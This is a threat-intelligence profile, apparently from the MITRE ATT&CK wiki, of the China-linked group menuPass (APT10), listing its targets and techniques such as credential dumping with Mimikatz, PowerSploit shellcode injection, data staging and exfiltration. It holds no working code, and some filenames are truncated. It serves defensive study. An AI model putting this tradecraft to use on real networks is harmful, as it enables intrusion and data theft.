Group: menuPass, Stone Panda, ...

From enterprise
Jump to: navigation, search
menuPass, Stone Panda, ...
ID G0045
Aliases menuPass, Stone Panda, APT10, Red Apollo, CVNX

menuPass is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university.12345

Alias Descriptions

  • Red Apollo - 4
  • CVNX - 4

Techniques Used

  • PowerShell - menuPass uses PowerSploit to inject shellcode into PowerShell.6
  • Credential Dumping - menuPass has used a modified version of pentesting tools wmiexec.vbs and to dump credentials.67
  • Command-Line Interface - menuPass executes commands using a command-line interface and reverse shell. The group has used a modified version of pentesting script wmiexec.vbs to execute commands.467
  • Remote System Discovery - menuPass uses scripts to enumerate IP ranges on the victim network.6 menuPass has also issued the command net view /domain to a PlugX implant to gather information about remote systems on the network.5
  • DLL Side-Loading - menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6.6
  • Account Discovery - menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data.6
  • Data Compressed - menuPass has compressed files before exfiltration using TAR and RAR.46
  • Scheduled Task - menuPass has used a script ( to execute a command on a target machine via Task Scheduler.6
  • Valid Accounts - menuPass has used valid accounts shared between Managed Service Providers and clients to move between the two environments.4
  • Data Staged - menuPass stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.4
  • Data from Network Shared Drive - menuPass has collected data from remote systems by mounting network shares with net use and using Robocopy to transfer data.4
  • Remote Services - menuPass has used Putty Secure Copy Client (PSCP) to transfer data.4
  • Connection Proxy - menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.5